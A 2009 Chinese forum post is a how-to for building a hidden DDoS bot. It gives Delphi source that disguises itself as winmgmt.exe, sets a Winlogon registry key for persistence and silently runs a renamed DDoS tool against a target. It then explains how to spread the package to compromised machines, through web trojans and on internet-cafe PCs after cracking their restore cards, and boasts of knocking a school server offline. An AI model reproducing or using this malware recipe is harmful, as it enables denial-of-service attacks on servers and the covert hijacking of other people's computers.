|
|
打造简单隐藏疯狂DDos攻击工具
xdos攻击效果是比较好的了,但是我们要做的是让他象教主的僵尸那样,放在很多肉鸡上运行,自动攻击目标服务器。xdos运行有cmd窗口,我们可以用delphi写个小程序让他隐藏窗口,并且实现开机自启动。
下面是源代码,很简单,
编译成winmgmt.exe program Project1; uses SysUtils, windows, system, shellapi; var buf:array[0..max_path] of char ; function regs(key:Hkey; subkey,name,value:string):boolean; var regkey:hkey; begin result := false; RegCreateKey(key,PChar(subkey),regkey); //根键,路径, if RegSetValueEx(regkey,Pchar(name),0,REG_SZ,pchar(value),length(value)) = 0 then result := true; RegCloseKey(regkey); end; begin getsystemdirectory(buf,max_path); //copyfile(pchar(’run.bat’),pchar(buf+’\run.bat’), FALSE); //copyfile(pchar(’mslta.exe’),pchar(buf+’\mslta.exe’), FALSE); //copyfile(pchar(’winmgmt.exe’),pchar(buf+’\winmgmt.exe’), FALSE); regs(HKEY_LOCAL_MACHINE,’Software\Microsoft\Windows NT\CurrentVersion\Winlogon’,’shell’,’Explorer.exe ’+buf+’\winmgmt.exe’); //根键,路径,子键,键值. ShellExecute(0,’open’,pchar(buf+’\run.bat’),nil,nil,SW_hide); end. 可以看到是写到注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \CurrentVersion\Winlogon下面shell键值实现自启动, 通过ShellExecute(0,’open’,pchar(buf+’\run.bat’),nil,nil,SW_hide);这一句。
隐藏运行system32下面的run.bat。
比如其run.bat内容如下: mslta.exe www.xxxxxxxxxxxx.com 80 -t 20 -s * mslta.exe就是同目录下面的xdos工具了,改个名而已。 这样写好之后,用winrar做成自解压工具,相信大家都很熟练了。
解压路径写上: %Systemroot%/system32/ 解压后运行:%Systemroot%/system32/winmgmt.exe 这样根据就做好。如果你有pcshare之类的很多肉鸡,你就可全部被他种上实现ddos. 也可以做成网页 木马 ,让种马者来集体ddos攻击。 如果你喜欢上网吧,你可以把网吧的还原卡密码破了,装上几台来ddos.网吧网速很快,带宽大,效果也可以,上网的人也大部分是只知道玩游戏的家伙。
以上方法很简单,也有缺点,如有进程,无法远程卸载,可能导致无法控制局面。 在肉鸡上运行后,没有任何窗口啊什么的,不过cpu占用率会上升,如果机器差,影响会很大。 不过效果还可以,我用两台机器国际我们学校服务器,网站就打不开了,即使打开了也特别慢。 |
|
发表于 2009-6-14 07:43:37